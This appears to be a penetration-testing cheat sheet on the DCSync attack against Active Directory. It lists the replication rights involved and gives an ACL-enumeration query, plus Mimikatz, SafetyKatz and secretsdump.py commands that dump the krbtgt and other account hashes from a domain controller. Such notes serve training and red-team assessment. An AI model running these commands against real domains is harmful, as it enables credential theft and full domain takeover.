# DCSync

### DC-Sync&#x20;

To perform DCSync attack we need the following rights on the Domain Object:<br>

1. Replicating Directory Changes ([DS-Replication-Get-Changes](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes))
2. Replicating Directory Changes All ([DS-Replication-Get-Changes-All](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-all))
3. Replicating Directory Changes In Filtered Set ([DS-Replication-Get-Changes-In-Filtered-Set](https://docs.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-in-filtered-set)) (this one isn’t always needed but we can add it just in case)

By default **Administrators, Domain Admins, Enterprise Admins, and Domain Controllers** groups have the required privileges.

The DCSync attack attempts to mimic the Domain Controller so that the hashes can be retrieved. The attack leverages the **Directory Replication Service (DRS)** Remote Protocol to request replication of user credentials from a DC.

To check who has the privileges to request user credentials from a DC:

{% code overflow="wrap" %}

```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```

{% endcode %}

### Example Scenarios to exploit DCSync:

1. We assume that we have User account hash that is the member of Domain Admins group.\
   \
   Since we have the user account in DA group, we can dump hashes of the user, perform O-PassTheHash via Mimikatz to perform DCSync by requesting credentials of KRBTGT from DC.<br>
2. We assume that we have User credentials that has WriteDACL rights on the Domain Object\
   \
   Since the user has WriteDACL privileges, we can use this to grant DCSync rights any user that we own. Once the owned user has DCSync rights, we can Invoke-Mimikatz and perform DCSync attack to retrieve KRBTGT hashes from the owned user shell.

### Exploit Locally

To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for us domain: &#x20;

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
```

{% endcode %}

### Exploit Remotely

{% code overflow="wrap" %}

```
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes

[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking
```

{% endcode %}